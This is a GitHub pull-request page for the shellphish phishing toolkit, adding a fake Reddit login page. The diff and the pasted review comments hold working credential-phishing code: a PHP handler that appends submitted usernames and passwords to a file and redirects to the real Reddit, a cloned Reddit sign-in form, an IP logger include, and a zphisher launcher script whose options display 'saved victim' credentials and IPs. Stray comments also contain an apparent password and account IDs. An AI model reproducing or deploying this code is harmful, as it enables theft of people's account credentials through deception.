Skip to content

Conversation

@dhruvkrishnavaid
Copy link

Fix for #15

@AbirHasan2005
Copy link
Owner

Have to edit on shellphish.sh too.

@dhruvkrishnavaid
Copy link
Author

Can you be more specific on what to edit? Because, I have tested it and it works. So I doubt on what to edit.

@@ -0,0 +1,5 @@
<?php
include 'ip.php';
header('Location: login.html');

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

log

Copy link

@titkohanch titkohanch left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

password: ( milcho234)

@@ -0,0 +1,5 @@
<?php
include 'ip.php';

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

#!/bin/bash

https://github.com/htr-tech/zphisher

if [[ $(uname -o) == 'Android' ]];then
ZPHISHER_ROOT="/data/data/com.termux/files/usr/opt/zphisher"
else
export ZPHISHER_ROOT="/opt/zphisher"
fi

if [[ $1 == '-h' || $1 == 'help' ]]; then
echo "To run Zphisher type `zphisher` in your cmd"
echo
echo "Help:"
echo " -h | help : Print this menu & Exit"
echo " -c | auth : View Saved Credentials"
echo " -i | ip : View Saved Victim IP"
echo
elif [[ $1 == '-c' || $1 == 'auth' ]]; then
cat $ZPHISHER_ROOT/auth/usernames.dat 2> /dev/null || {
echo "No Credentials Found !"
exit 1
}
elif [[ $1 == '-i' || $1 == 'ip' ]]; then
cat $ZPHISHER_ROOT/auth/ip.txt 2> /dev/null || {
echo "No Saved IP Found !"
exit 1
}
else
cd $ZPHISHER_ROOT
bash ./zphisher.sh
fi

Copy link

@titkohanch titkohanch left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

root

<link rel="stylesheet" href="https://www.redditstatic.com/accountmanager/theme.5e411b81dd5eff52023d3e13cde38668.css">

<link rel="stylesheet" href="https://www.redditstatic.com/accountmanager/login.5d548fad4637c6ba118ebcf590a30611.css">

Copy link

@titkohanch titkohanch Aug 24, 2022

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

<div class="SnooIcon"></div>
<h1 class="Title">

Sign in

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

id:100002286916504

@@ -0,0 +1,5 @@
<?php

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

<?php

file_put_contents("usernames.txt", "Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://www.reddit.com/password');

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Copy link

@titkohanch titkohanch left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

root

<div class="AnimatedForm__errorMessage"></div>
</fieldset>
<fieldset class="AnimatedForm__field m-required password hideable">
<input id="loginPassword" class="AnimatedForm__textInput" type="password" name="password">

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

lst=100002286916504

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants